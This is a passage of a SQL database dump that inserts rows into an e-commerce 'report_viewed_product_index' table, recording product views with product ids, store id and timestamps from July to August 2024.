(11507, NULL, NULL, 2054, 1, '2024-07-07 19:51:52'),
(11508, NULL, NULL, 2055, 1, '2024-07-07 20:05:50'),
(11509, NULL, NULL, 2061, 1, '2024-07-07 20:20:16'),
(11510, NULL, NULL, 2058, 1, '2024-07-07 20:53:16'),
(11511, NULL, NULL, 2064, 1, '2024-07-07 21:03:44'),
(11512, NULL, NULL, 2055, 1, '2024-07-08 06:00:24'),
(11513, NULL, NULL, 2054, 1, '2024-07-08 06:00:24'),
(11514, NULL, NULL, 2059, 1, '2024-07-08 06:00:27'),
(11515, NULL, NULL, 2062, 1, '2024-07-08 06:00:29'),
(11516, NULL, NULL, 2060, 1, '2024-07-08 06:00:30'),
(11517, NULL, NULL, 2064, 1, '2024-07-08 06:00:31'),
(11518, NULL, NULL, 2061, 1, '2024-07-08 06:00:31'),
(11519, NULL, NULL, 2063, 1, '2024-07-08 06:00:33'),
(11520, NULL, NULL, 2058, 1, '2024-07-08 06:00:34'),
(11521, NULL, NULL, 2060, 1, '2024-07-08 06:16:05'),
(11522, NULL, NULL, 2054, 1, '2024-07-08 06:38:49'),
(11523, NULL, NULL, 2054, 1, '2024-07-08 06:45:32'),
(11524, NULL, NULL, 2062, 1, '2024-07-08 07:42:45'),
(11525, NULL, NULL, 2060, 1, '2024-07-08 13:23:57'),
(11526, NULL, NULL, 2064, 1, '2024-07-08 14:16:44'),
(11527, NULL, NULL, 2064, 1, '2024-07-08 15:29:14'),
(11528, NULL, NULL, 2054, 1, '2024-07-08 15:29:29'),
(11529, NULL, NULL, 2064, 1, '2024-07-08 16:48:46'),
(11530, NULL, NULL, 2064, 1, '2024-07-08 17:54:39'),
(11531, NULL, NULL, 2055, 1, '2024-07-08 19:02:14'),
(11532, NULL, NULL, 2054, 1, '2024-07-08 19:02:16'),
(11533, NULL, NULL, 2060, 1, '2024-07-08 19:02:35'),
(11534, NULL, NULL, 2053, 1, '2024-07-08 19:02:40'),
(11535, NULL, NULL, 2061, 1, '2024-07-08 19:02:45'),
(11536, NULL, NULL, 2058, 1, '2024-07-08 19:02:57'),
(11537, NULL, NULL, 2064, 1, '2024-07-08 19:03:00'),
(11538, NULL, NULL, 2059, 1, '2024-07-08 19:03:04'),
(11539, NULL, NULL, 2064, 1, '2024-07-09 10:26:26'),
(11540, NULL, NULL, 2064, 1, '2024-07-09 11:23:02'),
(11541, NULL, NULL, 2054, 1, '2024-07-09 12:49:25'),
(11542, NULL, NULL, 2054, 1, '2024-07-09 17:56:13'),
(11543, NULL, NULL, 2062, 1, '2024-07-09 23:56:12'),
(11544, NULL, NULL, 2063, 1, '2024-07-09 23:56:36'),
(11545, NULL, NULL, 2061, 1, '2024-07-10 00:26:15'),
(11546, NULL, NULL, 2053, 1, '2024-07-10 00:26:19'),
(11547, NULL, NULL, 2055, 1, '2024-07-10 00:26:22'),
(11548, NULL, NULL, 2060, 1, '2024-07-10 00:26:29'),
(11549, NULL, NULL, 2064, 1, '2024-07-10 00:26:33'),
(11550, NULL, NULL, 2059, 1, '2024-07-10 00:26:47'),
(11551, NULL, NULL, 2058, 1, '2024-07-10 00:26:59'),
(11552, NULL, NULL, 2054, 1, '2024-07-10 00:27:07'),
(11553, NULL, NULL, 2062, 1, '2024-07-10 01:34:01'),
(11554, NULL, NULL, 2063, 1, '2024-07-10 01:34:10'),
(11555, NULL, NULL, 2064, 1, '2024-07-10 02:42:48'),
(11556, NULL, NULL, 2054, 1, '2024-07-10 04:17:11'),
(11557, NULL, NULL, 2059, 1, '2024-07-10 04:17:15'),
(11558, NULL, NULL, 2053, 1, '2024-07-10 04:17:42'),
(11559, NULL, NULL, 2063, 1, '2024-07-10 04:27:07'),
(11560, NULL, NULL, 2062, 1, '2024-07-10 04:27:54'),
(11561, NULL, NULL, 2060, 1, '2024-07-10 04:28:07'),
(11562, NULL, NULL, 2055, 1, '2024-07-10 04:37:19'),
(11563, NULL, NULL, 2058, 1, '2024-07-10 04:37:26'),
(11564, NULL, NULL, 2061, 1, '2024-07-10 04:37:46'),
(11565, NULL, NULL, 2064, 1, '2024-07-10 04:38:29'),
(11566, NULL, NULL, 2059, 1, '2024-07-10 07:32:39'),
(11567, NULL, NULL, 2059, 1, '2024-07-10 07:32:41'),
(11568, NULL, NULL, 2059, 1, '2024-07-10 07:32:46'),
(11569, NULL, NULL, 2058, 1, '2024-07-10 07:34:40'),
(11570, NULL, NULL, 2058, 1, '2024-07-10 07:34:46'),
(11571, NULL, NULL, 2062, 1, '2024-07-10 11:30:02'),
(11572, NULL, NULL, 2054, 1, '2024-07-10 17:11:04'),
(11573, NULL, NULL, 2055, 1, '2024-07-10 18:44:01'),
(11574, NULL, NULL, 2055, 1, '2024-07-10 18:52:52'),
(11575, NULL, NULL, 2061, 1, '2024-07-11 01:40:58'),
(11576, NULL, NULL, 2064, 1, '2024-07-11 01:41:00'),
(11577, NULL, NULL, 2059, 1, '2024-07-11 01:41:02'),
(11578, NULL, NULL, 2058, 1, '2024-07-11 01:41:03'),
(11579, NULL, NULL, 2062, 1, '2024-07-11 01:41:04'),
(11580, NULL, NULL, 2063, 1, '2024-07-11 01:41:05'),
(11581, NULL, NULL, 2063, 1, '2024-07-11 01:41:06'),
(11582, NULL, NULL, 2060, 1, '2024-07-11 01:41:33'),
(11583, NULL, NULL, 2054, 1, '2024-07-11 01:41:42'),
(11584, NULL, NULL, 2055, 1, '2024-07-11 01:41:43'),
(11585, NULL, NULL, 2064, 1, '2024-07-11 01:41:44'),
(11586, NULL, NULL, 2053, 1, '2024-07-11 01:41:46'),
(11587, NULL, NULL, 2064, 1, '2024-07-11 01:41:48'),
(11588, NULL, NULL, 2063, 1, '2024-07-11 02:22:21'),
(11589, NULL, NULL, 2062, 1, '2024-07-11 03:12:01'),
(11590, NULL, NULL, 2064, 1, '2024-07-11 03:32:04'),
(11591, NULL, NULL, 2055, 1, '2024-07-11 03:46:31'),
(11592, NULL, NULL, 2058, 1, '2024-07-11 05:57:40'),
(11593, NULL, NULL, 2058, 1, '2024-07-11 05:58:40'),
(11594, NULL, NULL, 2063, 1, '2024-07-11 06:10:35'),
(11595, NULL, NULL, 2062, 1, '2024-07-11 08:31:16'),
(11596, NULL, NULL, 2063, 1, '2024-07-11 12:04:14'),
(11597, NULL, NULL, 2061, 1, '2024-07-11 12:04:17'),
(11598, NULL, NULL, 2059, 1, '2024-07-11 12:04:18'),
(11599, NULL, NULL, 2064, 1, '2024-07-11 12:04:20'),
(11600, NULL, NULL, 2058, 1, '2024-07-11 12:04:21'),
(11601, NULL, NULL, 2062, 1, '2024-07-11 12:04:23');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(11602, NULL, NULL, 2062, 1, '2024-07-11 12:04:25'),
(11603, NULL, NULL, 2060, 1, '2024-07-11 12:04:57'),
(11604, NULL, NULL, 2054, 1, '2024-07-11 12:05:04'),
(11605, NULL, NULL, 2064, 1, '2024-07-11 12:05:05'),
(11606, NULL, NULL, 2064, 1, '2024-07-11 12:05:08'),
(11607, NULL, NULL, 2055, 1, '2024-07-11 12:05:09'),
(11608, NULL, NULL, 2053, 1, '2024-07-11 12:05:10'),
(11609, NULL, NULL, 2059, 1, '2024-07-11 18:17:04'),
(11610, NULL, NULL, 2061, 1, '2024-07-11 18:40:52'),
(11611, NULL, NULL, 2059, 1, '2024-07-11 20:23:11'),
(11612, NULL, NULL, 2058, 1, '2024-07-11 20:35:40'),
(11613, NULL, NULL, 2063, 1, '2024-07-11 22:50:11'),
(11614, NULL, NULL, 2061, 1, '2024-07-11 22:50:59'),
(11615, NULL, NULL, 2053, 1, '2024-07-11 22:56:01'),
(11616, NULL, NULL, 2063, 1, '2024-07-12 01:50:08'),
(11617, NULL, NULL, 2064, 1, '2024-07-12 01:56:59'),
(11618, NULL, NULL, 2054, 1, '2024-07-12 02:49:33'),
(11619, NULL, NULL, 2059, 1, '2024-07-12 02:56:14'),
(11620, NULL, NULL, 2060, 1, '2024-07-12 03:04:02'),
(11621, NULL, NULL, 2058, 1, '2024-07-12 06:35:25'),
(11622, NULL, NULL, 2064, 1, '2024-07-12 08:37:44'),
(11623, NULL, NULL, 2064, 1, '2024-07-12 09:16:10'),
(11624, NULL, NULL, 2060, 1, '2024-07-12 09:35:40'),
(11625, NULL, NULL, 2061, 1, '2024-07-12 09:35:44'),
(11626, NULL, NULL, 2058, 1, '2024-07-12 09:35:56'),
(11627, NULL, NULL, 2064, 1, '2024-07-12 09:36:09'),
(11628, NULL, NULL, 2059, 1, '2024-07-12 09:36:22'),
(11629, NULL, NULL, 2064, 1, '2024-07-12 09:37:09'),
(11630, NULL, NULL, 2055, 1, '2024-07-12 09:37:22'),
(11631, NULL, NULL, 2054, 1, '2024-07-12 09:37:35'),
(11632, NULL, NULL, 2058, 1, '2024-07-12 10:36:24'),
(11633, NULL, NULL, 2061, 1, '2024-07-12 11:12:00'),
(11634, NULL, NULL, 2054, 1, '2024-07-12 22:57:40'),
(11635, NULL, NULL, 2062, 1, '2024-07-13 03:11:04'),
(11636, NULL, NULL, 2062, 1, '2024-07-13 06:21:19'),
(11637, NULL, NULL, 2053, 1, '2024-07-13 06:32:24'),
(11638, NULL, NULL, 2054, 1, '2024-07-13 07:13:30'),
(11639, NULL, NULL, 2062, 1, '2024-07-13 07:23:38'),
(11640, NULL, NULL, 2064, 1, '2024-07-13 08:26:10'),
(11641, NULL, NULL, 2053, 1, '2024-07-13 10:43:57'),
(11642, NULL, NULL, 2054, 1, '2024-07-13 11:16:24'),
(11643, NULL, NULL, 2059, 1, '2024-07-13 11:16:31'),
(11644, NULL, NULL, 2061, 1, '2024-07-13 11:16:36'),
(11645, NULL, NULL, 2058, 1, '2024-07-13 11:16:42'),
(11646, NULL, NULL, 2064, 1, '2024-07-13 12:11:38'),
(11647, NULL, NULL, 2060, 1, '2024-07-13 12:15:34'),
(11648, NULL, NULL, 2062, 1, '2024-07-13 15:36:09'),
(11649, NULL, NULL, 2064, 1, '2024-07-13 16:38:16'),
(11650, NULL, NULL, 2062, 1, '2024-07-13 17:31:08'),
(11651, 2375, NULL, 2062, 1, '2024-07-13 17:51:57'),
(11652, NULL, NULL, 2060, 1, '2024-07-13 18:32:49'),
(11653, NULL, NULL, 2063, 1, '2024-07-13 18:43:23'),
(11654, NULL, NULL, 2058, 1, '2024-07-13 19:05:16'),
(11655, NULL, NULL, 2055, 1, '2024-07-13 19:46:23'),
(11656, NULL, NULL, 2061, 1, '2024-07-13 20:56:22'),
(11657, NULL, NULL, 2060, 1, '2024-07-13 21:45:12'),
(11658, NULL, NULL, 2063, 1, '2024-07-13 21:54:30'),
(11659, NULL, NULL, 2061, 1, '2024-07-14 01:45:36'),
(11660, NULL, NULL, 2055, 1, '2024-07-14 05:54:30'),
(11661, NULL, NULL, 2060, 1, '2024-07-14 08:28:06'),
(11662, NULL, NULL, 2063, 1, '2024-07-14 08:37:53'),
(11663, NULL, NULL, 2058, 1, '2024-07-14 09:02:04'),
(11664, NULL, NULL, 2055, 1, '2024-07-14 09:45:23'),
(11665, NULL, NULL, 2061, 1, '2024-07-14 10:55:14'),
(11666, NULL, NULL, 2062, 1, '2024-07-14 11:31:05'),
(11667, NULL, NULL, 2055, 1, '2024-07-14 12:02:31'),
(11668, NULL, NULL, 2061, 1, '2024-07-14 12:02:34'),
(11669, NULL, NULL, 2058, 1, '2024-07-14 12:02:35'),
(11670, NULL, NULL, 2059, 1, '2024-07-14 12:02:36'),
(11671, NULL, NULL, 2054, 1, '2024-07-14 12:02:37'),
(11672, NULL, NULL, 2063, 1, '2024-07-14 12:02:38'),
(11673, NULL, NULL, 2064, 1, '2024-07-14 12:02:40'),
(11674, NULL, NULL, 2060, 1, '2024-07-14 12:02:42'),
(11675, NULL, NULL, 2062, 1, '2024-07-14 12:02:46'),
(11676, NULL, NULL, 2053, 1, '2024-07-14 12:02:50'),
(11677, NULL, NULL, 2053, 1, '2024-07-14 12:06:49'),
(11678, NULL, NULL, 2054, 1, '2024-07-14 12:48:55'),
(11679, NULL, NULL, 2059, 1, '2024-07-14 13:03:50'),
(11680, NULL, NULL, 2064, 1, '2024-07-14 13:16:37'),
(11681, NULL, NULL, 2055, 1, '2024-07-14 20:05:23'),
(11682, NULL, NULL, 2060, 1, '2024-07-14 23:13:31'),
(11683, NULL, NULL, 2063, 1, '2024-07-14 23:21:35'),
(11684, NULL, NULL, 2061, 1, '2024-07-14 23:21:38'),
(11685, NULL, NULL, 2055, 1, '2024-07-14 23:21:43'),
(11686, NULL, NULL, 2064, 1, '2024-07-14 23:21:46'),
(11687, NULL, NULL, 2060, 1, '2024-07-14 23:21:50'),
(11688, NULL, NULL, 2059, 1, '2024-07-14 23:21:55'),
(11689, NULL, NULL, 2058, 1, '2024-07-14 23:22:02'),
(11690, NULL, NULL, 2062, 1, '2024-07-14 23:23:13'),
(11691, NULL, NULL, 2054, 1, '2024-07-14 23:23:18'),
(11692, NULL, NULL, 2061, 1, '2024-07-14 23:26:29'),
(11693, NULL, NULL, 2054, 1, '2024-07-14 23:26:43'),
(11694, NULL, NULL, 2059, 1, '2024-07-14 23:26:51'),
(11695, NULL, NULL, 2058, 1, '2024-07-14 23:26:55'),
(11696, NULL, NULL, 2060, 1, '2024-07-14 23:27:13'),
(11697, NULL, NULL, 2053, 1, '2024-07-14 23:28:43'),
(11698, NULL, NULL, 2055, 1, '2024-07-14 23:29:04'),
(11699, NULL, NULL, 2064, 1, '2024-07-14 23:29:44'),
(11700, NULL, NULL, 2063, 1, '2024-07-14 23:30:09'),
(11701, NULL, NULL, 2062, 1, '2024-07-14 23:30:17'),
(11702, NULL, NULL, 2060, 1, '2024-07-14 23:30:41'),
(11703, NULL, NULL, 2060, 1, '2024-07-14 23:49:04'),
(11704, NULL, NULL, 2063, 1, '2024-07-14 23:59:29'),
(11705, NULL, NULL, 2058, 1, '2024-07-15 00:20:48'),
(11706, NULL, NULL, 2055, 1, '2024-07-15 00:58:45'),
(11707, NULL, NULL, 2062, 1, '2024-07-15 01:46:40'),
(11708, NULL, NULL, 2061, 1, '2024-07-15 02:06:20'),
(11709, NULL, NULL, 2055, 1, '2024-07-15 02:23:20'),
(11710, NULL, NULL, 2064, 1, '2024-07-15 02:23:25'),
(11711, NULL, NULL, 2061, 1, '2024-07-15 02:23:28'),
(11712, NULL, NULL, 2058, 1, '2024-07-15 02:23:33'),
(11713, NULL, NULL, 2062, 1, '2024-07-15 02:44:23'),
(11714, NULL, NULL, 2054, 1, '2024-07-15 04:09:00'),
(11715, NULL, NULL, 2059, 1, '2024-07-15 04:25:40'),
(11716, NULL, NULL, 2064, 1, '2024-07-15 04:39:49'),
(11717, NULL, NULL, 2054, 1, '2024-07-15 15:20:10'),
(11718, NULL, NULL, 2054, 1, '2024-07-15 16:25:30'),
(11719, NULL, NULL, 2064, 1, '2024-07-15 20:09:17'),
(11720, NULL, NULL, 2055, 1, '2024-07-15 21:03:44'),
(11721, NULL, NULL, 2054, 1, '2024-07-15 23:59:55'),
(11722, NULL, NULL, 2064, 1, '2024-07-16 01:03:50'),
(11723, NULL, NULL, 2054, 1, '2024-07-16 01:11:01'),
(11724, NULL, NULL, 2060, 1, '2024-07-16 09:18:34'),
(11725, NULL, NULL, 2053, 1, '2024-07-16 10:02:09'),
(11726, NULL, NULL, 2061, 1, '2024-07-16 10:15:51'),
(11727, NULL, NULL, 2063, 1, '2024-07-16 12:44:11'),
(11728, NULL, NULL, 2064, 1, '2024-07-16 21:47:37'),
(11729, NULL, NULL, 2064, 1, '2024-07-16 22:15:21'),
(11730, NULL, NULL, 2063, 1, '2024-07-16 23:52:34'),
(11731, NULL, NULL, 2064, 1, '2024-07-17 08:55:52'),
(11732, NULL, NULL, 2064, 1, '2024-07-17 09:21:50'),
(11733, NULL, NULL, 2060, 1, '2024-07-17 10:20:29'),
(11734, NULL, NULL, 2060, 1, '2024-07-17 10:22:14'),
(11735, NULL, NULL, 2060, 1, '2024-07-17 11:37:07'),
(11736, NULL, NULL, 2053, 1, '2024-07-17 12:24:20'),
(11737, NULL, NULL, 2053, 1, '2024-07-17 13:46:08'),
(11738, NULL, NULL, 2064, 1, '2024-07-17 15:44:52'),
(11739, NULL, NULL, 2058, 1, '2024-07-17 16:49:44'),
(11740, NULL, NULL, 2064, 1, '2024-07-17 20:44:00'),
(11741, NULL, NULL, 2061, 1, '2024-07-17 21:20:07'),
(11742, NULL, NULL, 2058, 1, '2024-07-18 10:12:00'),
(11743, NULL, NULL, 2064, 1, '2024-07-18 11:48:29'),
(11744, NULL, NULL, 2059, 1, '2024-07-18 12:25:40'),
(11745, NULL, NULL, 2060, 1, '2024-07-18 13:33:23'),
(11746, NULL, NULL, 2064, 1, '2024-07-18 14:07:59'),
(11747, NULL, NULL, 2064, 1, '2024-07-18 14:57:44'),
(11748, NULL, NULL, 2062, 1, '2024-07-18 22:18:59'),
(11749, NULL, NULL, 2054, 1, '2024-07-18 22:45:52'),
(11750, NULL, NULL, 2064, 1, '2024-07-19 02:47:30'),
(11751, NULL, NULL, 2055, 1, '2024-07-19 13:45:36'),
(11752, NULL, NULL, 2059, 1, '2024-07-19 20:07:02'),
(11753, NULL, NULL, 2061, 1, '2024-07-19 21:50:56'),
(11754, NULL, NULL, 2063, 1, '2024-07-21 00:39:26'),
(11755, NULL, NULL, 2060, 1, '2024-07-21 08:04:18'),
(11756, NULL, NULL, 2054, 1, '2024-07-22 05:38:43'),
(11757, NULL, NULL, 2061, 1, '2024-07-23 15:59:55'),
(11758, NULL, NULL, 2059, 1, '2024-07-23 22:11:03'),
(11759, NULL, NULL, 2054, 1, '2024-07-23 22:49:43'),
(11760, NULL, NULL, 2059, 1, '2024-07-23 23:10:57'),
(11761, NULL, NULL, 2058, 1, '2024-07-23 23:34:33'),
(11762, NULL, NULL, 2058, 1, '2024-07-24 05:08:48'),
(11763, NULL, NULL, 2064, 1, '2024-07-24 05:21:17'),
(11764, NULL, NULL, 2058, 1, '2024-07-24 05:56:17'),
(11765, NULL, NULL, 2058, 1, '2024-07-24 05:56:17'),
(11766, NULL, NULL, 2054, 1, '2024-07-24 10:15:00'),
(11767, NULL, NULL, 2058, 1, '2024-07-24 11:24:33'),
(11768, NULL, NULL, 2058, 1, '2024-07-24 14:18:51'),
(11769, NULL, NULL, 2058, 1, '2024-07-24 14:18:51'),
(11770, NULL, NULL, 2054, 1, '2024-07-24 20:21:53'),
(11771, NULL, NULL, 2060, 1, '2024-07-24 20:46:00'),
(11772, NULL, NULL, 2053, 1, '2024-07-24 20:59:27'),
(11773, NULL, NULL, 2061, 1, '2024-07-24 21:14:44'),
(11774, NULL, NULL, 2059, 1, '2024-07-24 22:12:23'),
(11775, NULL, NULL, 2064, 1, '2024-07-24 22:33:07'),
(11776, NULL, NULL, 2062, 1, '2024-07-24 23:00:24'),
(11777, NULL, NULL, 2064, 1, '2024-07-24 23:03:55'),
(11778, NULL, NULL, 2064, 1, '2024-07-24 23:13:15'),
(11779, NULL, NULL, 2054, 1, '2024-07-24 23:21:59'),
(11780, NULL, NULL, 2062, 1, '2024-07-24 23:41:01'),
(11781, NULL, NULL, 2054, 1, '2024-07-24 23:53:12'),
(11782, NULL, NULL, 2054, 1, '2024-07-24 23:53:31'),
(11783, NULL, NULL, 2062, 1, '2024-07-25 00:10:16'),
(11784, NULL, NULL, 2060, 1, '2024-07-25 00:18:43'),
(11785, NULL, NULL, 2061, 1, '2024-07-25 00:48:42'),
(11786, NULL, NULL, 2059, 1, '2024-07-25 01:35:06'),
(11787, NULL, NULL, 2054, 1, '2024-07-25 02:03:08'),
(11788, NULL, NULL, 2061, 1, '2024-07-25 02:03:08'),
(11789, NULL, NULL, 2059, 1, '2024-07-25 02:03:11'),
(11790, NULL, NULL, 2064, 1, '2024-07-25 02:10:21'),
(11791, NULL, NULL, 2062, 1, '2024-07-25 02:36:50'),
(11792, NULL, NULL, 2055, 1, '2024-07-25 03:15:29'),
(11793, NULL, NULL, 2063, 1, '2024-07-25 03:56:16'),
(11794, NULL, NULL, 2058, 1, '2024-07-25 04:09:13'),
(11795, NULL, NULL, 2053, 1, '2024-07-25 09:00:15'),
(11796, NULL, NULL, 2061, 1, '2024-07-25 11:10:18'),
(11797, NULL, NULL, 2055, 1, '2024-07-25 11:38:27'),
(11798, NULL, NULL, 2054, 1, '2024-07-25 18:14:14'),
(11799, NULL, NULL, 2054, 1, '2024-07-25 18:29:20'),
(11800, NULL, NULL, 2060, 1, '2024-07-25 20:43:41'),
(11801, NULL, NULL, 2059, 1, '2024-07-25 20:44:31'),
(11802, NULL, NULL, 2061, 1, '2024-07-25 20:45:07'),
(11803, NULL, NULL, 2058, 1, '2024-07-25 20:45:47'),
(11804, NULL, NULL, 2054, 1, '2024-07-25 22:45:05'),
(11805, NULL, NULL, 2058, 1, '2024-07-25 23:27:48'),
(11806, NULL, NULL, 2053, 1, '2024-07-26 00:25:46'),
(11807, NULL, NULL, 2054, 1, '2024-07-26 00:26:20'),
(11808, NULL, NULL, 2055, 1, '2024-07-26 00:26:59'),
(11809, NULL, NULL, 2064, 1, '2024-07-26 00:32:50'),
(11810, NULL, NULL, 2063, 1, '2024-07-26 00:37:39'),
(11811, NULL, NULL, 2062, 1, '2024-07-26 00:38:14'),
(11812, NULL, NULL, 2060, 1, '2024-07-26 00:38:52'),
(11813, NULL, NULL, 2059, 1, '2024-07-26 00:39:30'),
(11814, NULL, NULL, 2061, 1, '2024-07-26 00:40:09'),
(11815, NULL, NULL, 2062, 1, '2024-07-26 03:51:16'),
(11816, NULL, NULL, 2053, 1, '2024-07-26 04:34:05'),
(11817, NULL, NULL, 2054, 1, '2024-07-26 04:34:40'),
(11818, NULL, NULL, 2055, 1, '2024-07-26 04:35:17'),
(11819, NULL, NULL, 2063, 1, '2024-07-26 04:38:23'),
(11820, NULL, NULL, 2064, 1, '2024-07-26 04:40:57'),
(11821, NULL, NULL, 2060, 1, '2024-07-26 14:05:32'),
(11822, NULL, NULL, 2055, 1, '2024-07-26 18:57:26'),
(11823, NULL, NULL, 2054, 1, '2024-07-26 21:00:36'),
(11824, NULL, NULL, 2064, 1, '2024-07-26 21:46:29'),
(11825, NULL, NULL, 2059, 1, '2024-07-27 13:30:51'),
(11826, NULL, NULL, 2064, 1, '2024-07-27 21:04:17'),
(11827, NULL, NULL, 2054, 1, '2024-07-28 04:54:47'),
(11828, NULL, NULL, 2063, 1, '2024-07-28 08:52:19'),
(11829, NULL, NULL, 2062, 1, '2024-07-28 11:32:23'),
(11830, NULL, NULL, 2060, 1, '2024-07-28 23:45:17'),
(11831, NULL, NULL, 2055, 1, '2024-07-29 01:37:47'),
(11832, NULL, NULL, 2063, 1, '2024-07-29 03:21:39'),
(11833, NULL, NULL, 2058, 1, '2024-07-29 05:37:52'),
(11834, NULL, NULL, 2061, 1, '2024-07-29 10:12:06'),
(11835, NULL, NULL, 2064, 1, '2024-07-29 11:10:16'),
(11836, NULL, NULL, 2063, 1, '2024-07-29 15:39:37'),
(11837, NULL, NULL, 2064, 1, '2024-07-30 00:03:33'),
(11838, NULL, NULL, 2054, 1, '2024-07-30 03:43:41'),
(11839, NULL, NULL, 2064, 1, '2024-07-30 10:38:43'),
(11840, NULL, NULL, 2059, 1, '2024-07-30 14:12:30'),
(11841, NULL, NULL, 2061, 1, '2024-07-30 15:38:56'),
(11842, NULL, NULL, 2061, 1, '2024-07-30 17:50:51'),
(11843, NULL, NULL, 2064, 1, '2024-07-31 00:49:47'),
(11844, NULL, NULL, 2058, 1, '2024-07-31 03:10:01'),
(11845, NULL, NULL, 2064, 1, '2024-07-31 04:28:41'),
(11846, NULL, NULL, 2053, 1, '2024-07-31 04:39:22'),
(11847, NULL, NULL, 2054, 1, '2024-07-31 07:18:04'),
(11848, NULL, NULL, 2054, 1, '2024-07-31 09:11:20'),
(11849, NULL, NULL, 2054, 1, '2024-07-31 18:22:02'),
(11850, NULL, NULL, 2064, 1, '2024-07-31 18:43:48'),
(11851, NULL, NULL, 2062, 1, '2024-07-31 19:16:06'),
(11852, NULL, NULL, 2064, 1, '2024-08-01 03:07:14'),
(11853, NULL, NULL, 2063, 1, '2024-08-01 03:07:21'),
(11854, NULL, NULL, 2062, 1, '2024-08-01 03:07:25'),
(11855, NULL, NULL, 2061, 1, '2024-08-01 03:07:29'),
(11856, NULL, NULL, 2060, 1, '2024-08-01 03:07:32'),
(11857, NULL, NULL, 2061, 1, '2024-08-01 03:07:41'),
(11858, NULL, NULL, 2059, 1, '2024-08-01 03:07:44'),
(11859, NULL, NULL, 2058, 1, '2024-08-01 03:07:50'),
(11860, NULL, NULL, 2054, 1, '2024-08-01 03:07:53'),
(11861, NULL, NULL, 2058, 1, '2024-08-01 03:08:02'),
(11862, NULL, NULL, 2061, 1, '2024-08-01 03:08:05'),
(11863, NULL, NULL, 2063, 1, '2024-08-01 03:08:08'),
(11864, NULL, NULL, 2055, 1, '2024-08-01 03:08:18'),
(11865, NULL, NULL, 2064, 1, '2024-08-01 03:08:22'),
(11866, NULL, NULL, 2058, 1, '2024-08-01 03:08:25'),
(11867, NULL, NULL, 2059, 1, '2024-08-01 03:08:28'),
(11868, NULL, NULL, 2060, 1, '2024-08-01 03:08:31'),
(11869, NULL, NULL, 2061, 1, '2024-08-01 03:08:33'),
(11870, NULL, NULL, 2062, 1, '2024-08-01 03:08:37'),
(11871, NULL, NULL, 2063, 1, '2024-08-01 03:08:40'),
(11872, NULL, NULL, 2054, 1, '2024-08-01 03:08:44'),
(11873, NULL, NULL, 2060, 1, '2024-08-01 03:08:47'),
(11874, NULL, NULL, 2059, 1, '2024-08-01 03:08:50'),
(11875, NULL, NULL, 2062, 1, '2024-08-01 03:08:54'),
(11876, NULL, NULL, 2064, 1, '2024-08-01 03:09:02'),
(11877, NULL, NULL, 2063, 1, '2024-08-01 03:09:06'),
(11878, NULL, NULL, 2062, 1, '2024-08-01 03:09:09'),
(11879, NULL, NULL, 2061, 1, '2024-08-01 03:09:11'),
(11880, NULL, NULL, 2060, 1, '2024-08-01 03:09:16'),
(11881, NULL, NULL, 2059, 1, '2024-08-01 03:09:18'),
(11882, NULL, NULL, 2058, 1, '2024-08-01 03:09:21'),
(11883, NULL, NULL, 2055, 1, '2024-08-01 03:09:24'),
(11884, NULL, NULL, 2054, 1, '2024-08-01 03:09:28'),
(11885, NULL, NULL, 2053, 1, '2024-08-01 03:09:32'),
(11886, NULL, NULL, 2064, 1, '2024-08-01 03:09:41'),
(11887, NULL, NULL, 2058, 1, '2024-08-01 03:09:45'),
(11888, NULL, NULL, 2059, 1, '2024-08-01 03:09:48'),
(11889, NULL, NULL, 2060, 1, '2024-08-01 03:09:52'),
(11890, NULL, NULL, 2061, 1, '2024-08-01 03:09:55'),
(11891, NULL, NULL, 2062, 1, '2024-08-01 03:09:58'),
(11892, NULL, NULL, 2063, 1, '2024-08-01 03:10:01'),
(11893, NULL, NULL, 2064, 1, '2024-08-01 03:10:15'),
(11894, NULL, NULL, 2063, 1, '2024-08-01 03:10:20'),
(11895, NULL, NULL, 2062, 1, '2024-08-01 03:10:24'),
(11896, NULL, NULL, 2061, 1, '2024-08-01 03:10:26'),
(11897, NULL, NULL, 2060, 1, '2024-08-01 03:10:28'),
(11898, NULL, NULL, 2059, 1, '2024-08-01 03:10:31'),
(11899, NULL, NULL, 2058, 1, '2024-08-01 03:10:35'),
(11900, NULL, NULL, 2055, 1, '2024-08-01 03:10:37'),
(11901, NULL, NULL, 2054, 1, '2024-08-01 03:10:40'),
(11902, NULL, NULL, 2064, 1, '2024-08-01 03:10:43'),
(11903, NULL, NULL, 2058, 1, '2024-08-01 03:10:48'),
(11904, NULL, NULL, 2059, 1, '2024-08-01 03:10:52'),
(11905, NULL, NULL, 2060, 1, '2024-08-01 03:10:55'),
(11906, NULL, NULL, 2061, 1, '2024-08-01 03:10:59'),
(11907, NULL, NULL, 2062, 1, '2024-08-01 03:11:02'),
(11908, NULL, NULL, 2063, 1, '2024-08-01 03:11:05'),
(11909, NULL, NULL, 2064, 1, '2024-08-01 03:11:13'),
(11910, NULL, NULL, 2063, 1, '2024-08-01 03:11:16'),
(11911, NULL, NULL, 2062, 1, '2024-08-01 03:11:19'),
(11912, NULL, NULL, 2061, 1, '2024-08-01 03:11:22'),
(11913, NULL, NULL, 2060, 1, '2024-08-01 03:11:24'),
(11914, NULL, NULL, 2059, 1, '2024-08-01 03:11:27'),
(11915, NULL, NULL, 2058, 1, '2024-08-01 03:11:30'),
(11916, NULL, NULL, 2055, 1, '2024-08-01 03:11:33'),
(11917, NULL, NULL, 2054, 1, '2024-08-01 03:11:36'),
(11918, NULL, NULL, 2064, 1, '2024-08-01 03:11:59'),
(11919, NULL, NULL, 2063, 1, '2024-08-01 03:12:03'),
(11920, NULL, NULL, 2062, 1, '2024-08-01 03:12:06'),
(11921, NULL, NULL, 2061, 1, '2024-08-01 03:12:09'),
(11922, NULL, NULL, 2060, 1, '2024-08-01 03:12:12'),
(11923, NULL, NULL, 2059, 1, '2024-08-01 03:12:15'),
(11924, NULL, NULL, 2058, 1, '2024-08-01 03:12:19'),
(11925, NULL, NULL, 2055, 1, '2024-08-01 03:12:22'),
(11926, NULL, NULL, 2054, 1, '2024-08-01 03:12:25'),
(11927, NULL, NULL, 2064, 1, '2024-08-01 03:12:34'),
(11928, NULL, NULL, 2063, 1, '2024-08-01 03:12:38'),
(11929, NULL, NULL, 2062, 1, '2024-08-01 03:12:40'),
(11930, NULL, NULL, 2061, 1, '2024-08-01 03:12:44'),
(11931, NULL, NULL, 2060, 1, '2024-08-01 03:12:48'),
(11932, NULL, NULL, 2059, 1, '2024-08-01 03:12:50'),
